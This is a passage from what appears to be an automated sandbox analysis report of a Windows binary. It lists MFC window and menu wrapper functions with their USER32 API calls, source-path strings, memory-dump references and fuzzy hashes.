                                • Instruction Fuzzy Hash: 2EE02B75A0820CFBC720DFA8DE48D9AB7BDDF48300B208058FA08C3240DA35ED02D754
                                APIs
                                • IsWindow.USER32(?), ref: 00707780
                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 007077AE
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 0070778F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$PeekPostQuitSendWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 2781468842-1404496517
                                • Opcode ID: 324b0988994d268a1e62bc912704409027ee548a127cdf5972f794e1c3774608
                                • Instruction ID: 587943f18bb8939040453030744ef4432b9d860a1c4f63769eb7b22c88f6cd43
                                • Opcode Fuzzy Hash: 324b0988994d268a1e62bc912704409027ee548a127cdf5972f794e1c3774608
                                • Instruction Fuzzy Hash: E5E09B75748304FBD728CB54DD45F5A77ACEB48740F240198FA0C972D1D675ED00D654
                                APIs
                                • IsWindow.USER32(?), ref: 006F6940
                                • SetMenu.USER32(?,00000000), ref: 006F696E
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp, xrefs: 006F694F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$MenuPeekPostQuitWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 3969843890-4102074842
                                • Opcode ID: 7ffa76adf02b482fdebdd25185ea6391c76fe1847ecffc9c000e70d36f74165b
                                • Instruction ID: aab2b1972916fa182a527a16eb6864a74bb1b1e9188fcb3b341f05d6e8199ded
                                • Opcode Fuzzy Hash: 7ffa76adf02b482fdebdd25185ea6391c76fe1847ecffc9c000e70d36f74165b
                                • Instruction Fuzzy Hash: B2E0EDB1A04208FBC324DB58DA05DAA77FDEF88340B100198FA0893381CA32DE11DA14
                                APIs
                                • IsWindow.USER32(?), ref: 007064C0
                                • SetActiveWindow.USER32(?), ref: 007064E5
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 007064CF
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageWindow$ActivePeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 611766548-1404496517
                                • Opcode ID: 144b9b639400a77676fa60c75fadfbd94f4037146bf1a7f4084888a3c20e08b8
                                • Instruction ID: e573c6a59953c0693817e04d7e7a5c9d3f7a2268fdfb308e6e306b0d0dfbebc3
                                • Opcode Fuzzy Hash: 144b9b639400a77676fa60c75fadfbd94f4037146bf1a7f4084888a3c20e08b8
                                • Instruction Fuzzy Hash: EFE0D871A04208EBC724DBA4DE19D2A77EDEF48300B14029CFA08D7681DA39DD10DA95
                                APIs
                                • IsWindow.USER32(?), ref: 007067C0
                                • GetLastActivePopup.USER32(?), ref: 007067E5
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 007067CF
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$ActiveLastPeekPopupPostQuitWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 3607355913-1404496517
                                • Opcode ID: 731d464fbaa5f7cbdb5ec2bd962e9d8d6220d382217eb9c1e8a6522640dfae4e
                                • Instruction ID: 478e1a2ecde4ac9cf21db9748f41ae462c298b611c7fd5c45aa1e105e98a4bf3
                                • Opcode Fuzzy Hash: 731d464fbaa5f7cbdb5ec2bd962e9d8d6220d382217eb9c1e8a6522640dfae4e
                                • Instruction Fuzzy Hash: E7E0D871A04208FBC714DBA4DD59D2A77FDEF4C304B14069CFA08D7681DA39DD10DA55
                                APIs
                                • IsWindow.USER32(?), ref: 00706860
                                • GetParent.USER32(?), ref: 00706885
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 0070686F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$ParentPeekPostQuitWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 3083592475-1404496517
                                • Opcode ID: 7be4f7f2c517ab831e1c600f906c69054e59350d46b0b2b4240f0ad33e459664
                                • Instruction ID: 4d9f89e959dcd2381d457366d40f45cb102fb8021ee5f56bcaff4a4ecf41083f
                                • Opcode Fuzzy Hash: 7be4f7f2c517ab831e1c600f906c69054e59350d46b0b2b4240f0ad33e459664
                                • Instruction Fuzzy Hash: 64E09271A14208EBC714DBA5D919D2A77BCEF48300B100298F90893281DA39DD109A55
                                APIs
                                • IsWindow.USER32(?), ref: 006F68F0
                                • GetMenu.USER32(?), ref: 006F6915
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp, xrefs: 006F68FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$MenuPeekPostQuitWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 3969843890-4102074842
                                • Opcode ID: 95e799332021840278313b64c9b3d23b457d1579e93c7cfe293bc617a80175a0
                                • Instruction ID: 232204b044a33537e305ee6cd615f29ae4aca26f65626dbf2e8385642ab1f033
                                • Opcode Fuzzy Hash: 95e799332021840278313b64c9b3d23b457d1579e93c7cfe293bc617a80175a0
                                • Instruction Fuzzy Hash: 23E0DF71A1420CFBC724DBA5EE09D6E77BDEF88300B200288FA08D3341DA75DE119B68
                                APIs
                                • IsMenu.USER32(?), ref: 00719DD0
                                • GetMenuItemID.USER32(?,?), ref: 00719DF9
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl, xrefs: 00719DDF
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MenuMessage$ItemPeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
                                • API String ID: 1338967306-337023061
                                • Opcode ID: d088f233db6af492da76bd0dd3ca8c28c79a493c0010225b5f4c7c9c691d7e5d
                                • Instruction ID: a57c517cc8515016e2892dbcb5f1bd2805c64f7cf9d2aee8464ac80383e80cd1
                                • Opcode Fuzzy Hash: d088f233db6af492da76bd0dd3ca8c28c79a493c0010225b5f4c7c9c691d7e5d
                                • Instruction Fuzzy Hash: 7AE09B75708208BBC724CB94D944D5AB7BCDF48300B208159FE09D3341D635ED01D665
                                APIs
                                • IsWindow.USER32(?), ref: 00705D90
                                • GetClientRect.USER32(?,?), ref: 00705DB6
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 00705D9C
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$ClientPeekPostQuitRectWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 3658338243-1404496517
                                • Opcode ID: 6555803d9cede5e48bf0db76da4a63e85f164a22578f3e57ac922d6543894862
                                • Instruction ID: 0396d0123e75fd9b764b0fc14f9caa407596f3a2c278139d86643a40c7685789
                                • Opcode Fuzzy Hash: 6555803d9cede5e48bf0db76da4a63e85f164a22578f3e57ac922d6543894862
                                • Instruction Fuzzy Hash: 69E092B5B04208EFC724CF94D989D6B77F9EF88740B24425EF90897381DA39DD02EA54
                                APIs
                                • IsWindow.USER32(?), ref: 00705ED0
                                • ScreenToClient.USER32(?,?), ref: 00705EF6
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 00705EDC
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$ClientPeekPostQuitScreenWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 4183865463-1404496517
                                • Opcode ID: 87c6b2057ff8d202782181888d175c5201db9836291c5d805ab7b9bb733a4c6b
                                • Instruction ID: e3b0eb664607c50453c31307ac196d2a9ddc60f47f35ad6916c44e4ee43fb602
                                • Opcode Fuzzy Hash: 87c6b2057ff8d202782181888d175c5201db9836291c5d805ab7b9bb733a4c6b
                                • Instruction Fuzzy Hash: 05E092B5614208EBC724CF95D945D6B77FCEF8C344B240298F90897280DA35DE01EA54
                                APIs
                                • IsWindow.USER32(8B55FF8B), ref: 00708000
                                • GetScrollPos.USER32(8B55FF8B,00000002), ref: 00708027
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 0070800F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$PeekPostQuitScrollWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 300521384-1404496517
                                • Opcode ID: 2369a4f5f0e0438d078e44446f9eae2cc08c79cb0cdaf5e366d0e2d8265e01cf
                                • Instruction ID: 3412dc38dfb5379f144420588023fb1f2ea1947cb7ff7d550f869fb41dce987f
                                • Opcode Fuzzy Hash: 2369a4f5f0e0438d078e44446f9eae2cc08c79cb0cdaf5e366d0e2d8265e01cf
                                • Instruction Fuzzy Hash: EDE0D8B1604208EBC724CB94DD09E2D77F9FB48310F140288FE48A73C1EA76DD00AA55
                                APIs
                                • IsWindow.USER32(8BE44D8B), ref: 007061E0
                                • IsWindowVisible.USER32(8BE44D8B), ref: 00706205
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 007061EF
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageWindow$PeekPostQuitVisible
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 3329501335-1404496517
                                • Opcode ID: b9d6d3aeb5309df84e261aa2c7efdb291e18cfeb91ca21549c5aa1741cc29bc8
                                • Instruction ID: 1ce271568f9655d777dcd8ffc55f82be5d2bb3f81feeeb33d836a0d9fdd2ca13
                                • Opcode Fuzzy Hash: b9d6d3aeb5309df84e261aa2c7efdb291e18cfeb91ca21549c5aa1741cc29bc8
                                • Instruction Fuzzy Hash: 28E04F7561420CFBC728DB95DA55E2A77E8EF48350F2402A8FA08D3291DA35DD10AA55
                                APIs
                                • IsWindow.USER32(?), ref: 007069A0
                                • SetForegroundWindow.USER32(?), ref: 007069C5
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 007069AF
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageWindow$ForegroundPeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 1882454291-1404496517
                                • Opcode ID: 9bae369cbd44b352dda8608a6fc7899f8da2bc4f03afeff150d8703570ea3a9e
                                • Instruction ID: f93261fdc6d7744cd192c4120e897777aff0362ae4adf4282556ecde63c680d4
                                • Opcode Fuzzy Hash: 9bae369cbd44b352dda8608a6fc7899f8da2bc4f03afeff150d8703570ea3a9e
                                • Instruction Fuzzy Hash: EDE0DF71624208EBC728CB95DE55D6A77ECEF88340B20028CFD0897381DA35ED109A50
                                APIs
                                • IsMenu.USER32(?), ref: 00719D90
                                • GetMenuItemCount.USER32(?), ref: 00719DB5
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl, xrefs: 00719D9F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MenuMessage$CountItemPeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
                                • API String ID: 1975119262-337023061
                                • Opcode ID: d47af4ac463a52ecfcd22c184c1d4e56f965e55e9bd680cb9fd07878d7877943
                                • Instruction ID: c6b56eb4b6893dd746e80c462d12eff48bd903cbb7c4dc2d3af2864002ee6806
                                • Opcode Fuzzy Hash: d47af4ac463a52ecfcd22c184c1d4e56f965e55e9bd680cb9fd07878d7877943
                                • Instruction Fuzzy Hash: F5E0D835708208ABC724CB94EA09D59B7BCEF44700B100058FE0893381DA36ED01C615
                                APIs
                                • IsWindow.USER32(?), ref: 00705FC0
                                • UpdateWindow.USER32(?), ref: 00705FE5
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl, xrefs: 00705FCF
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageWindow$PeekPostQuitUpdate
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                • API String ID: 979821001-1404496517
                                • Opcode ID: 2d06e417281e9202abea0a1e94bcc749e8a93b26a82e86c484b75167e80d655a
                                • Instruction ID: 478eb4f0d28b76acb677d70654d551717f43942e31078880d9b8ec33beb01821
                                • Opcode Fuzzy Hash: 2d06e417281e9202abea0a1e94bcc749e8a93b26a82e86c484b75167e80d655a
                                • Instruction Fuzzy Hash: 5EE0DF71608208EBC728CB94DA05E2A77FDFF48300B200298FA0897280DA3AED019E61